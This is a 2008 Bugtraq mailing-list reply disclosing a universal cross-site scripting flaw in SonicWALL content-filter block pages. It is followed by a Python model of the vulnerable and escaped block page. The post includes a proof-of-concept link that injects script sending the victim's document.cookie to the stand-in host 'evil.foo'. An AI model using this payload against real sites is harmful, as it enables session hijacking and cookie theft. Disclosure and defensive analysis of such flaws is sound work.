Bugtraq mailing list archives

Re: Re: Re: [Full-disclosure] Universal Website Hijacking by Exploiting Firewall Content Filtering Features + SonicWALL firewalls 0day


From: unknown.pentester () gmail com
Date: Wed, 5 Nov 2008 00:57:42 -0700

It is universal because any domain/website can be hijacked not because all vendors are affected! I never claimed that 
all vendors are affected.

Also, the SonicWALL vuln you mentioned is NOT the same issue! That vuln affects the web logs console of the appliance 
which means that exploitation is aimed at compromising the *device* NOT websites the victim user visits. 

Notice that the advisory says:

"the attacker may execute scripts automatically when the logfile is viewed."

The vuln I reported allows you to hijack any site. i.e.: run scripting code within the security context of any website. 
In other words, it's not a vulnerability that can be used to compromise the SonicWALL appliance, but rather to steal 
information from any sites (i.e.: active webmail session), steal cookies, etc ...

Furthermore, the targeted website doesn't have to be blacklisted (i.e.: adware site), but rather *swearing terms* need 
to be blocked. By simply inserting a swearing term (notice the f word) into any site's URL, script injection within 
that site is possible. i.e.:

<html><head><title>SonicWall Universal XSS PoC</title></head>
<body>
<h2>SonicWall Universal XSS PoC</h2>
<a href="http://google.com/fuck#<script>location='http://evil.foo/'+document.cookie</script>">Click me!</a>
</body></html>

That's because the SonicWALL appliance replies on behalf of the requested site, so the browser "believes" that the 
inserted script is actually returned by the requested website. You could think of this as a MITM XSS.

Hope it makes sense.

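As an added illustration (not code from the original post and not SonicWALL's implementation), the following Python models the block-page behaviour described above: a content filter that answers on behalf of the requested site and reflects the offending URL into its HTML. The blocked-term list, the page markup and the function names are assumptions for the demonstration; the hardened variant shows the defender's fix of escaping the reflected value.

```python
import html
from urllib.parse import urlsplit

# Constructed example, not vendor code: a minimal model of a content filter
# that intercepts a request and serves a block page in place of the real site.
BLOCKED_TERMS = {"fuck"}  # assumed "swearing term" list for the demo


def is_blocked(url: str) -> bool:
    """Return True if the URL path or query contains a blocked term."""
    parts = urlsplit(url)
    haystack = (parts.path + "?" + parts.query).lower()
    return any(term in haystack for term in BLOCKED_TERMS)


def block_page_vulnerable(url: str) -> str:
    """Reflects the raw URL into the block page.

    Because the browser received this response for the requested site's
    origin, any markup inside the URL runs in that site's security context.
    """
    return ("<html><body><h1>Access denied</h1>"
            f"<p>Blocked URL: {url}</p></body></html>")


def block_page_hardened(url: str) -> str:
    """Same block page, but the reflected URL is HTML-escaped first.

    Injected markup is rendered as literal text, so the reflection no
    longer gives script execution in the requested site's origin.
    """
    safe = html.escape(url, quote=True)
    return ("<html><body><h1>Access denied</h1>"
            f"<p>Blocked URL: {safe}</p></body></html>")


def filter_response(url: str, escape: bool) -> str:
    """Model the appliance: pass through, or answer with a block page."""
    if not is_blocked(url):
        return "PASS"  # request would be forwarded to the real site
    return block_page_hardened(url) if escape else block_page_vulnerable(url)
```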
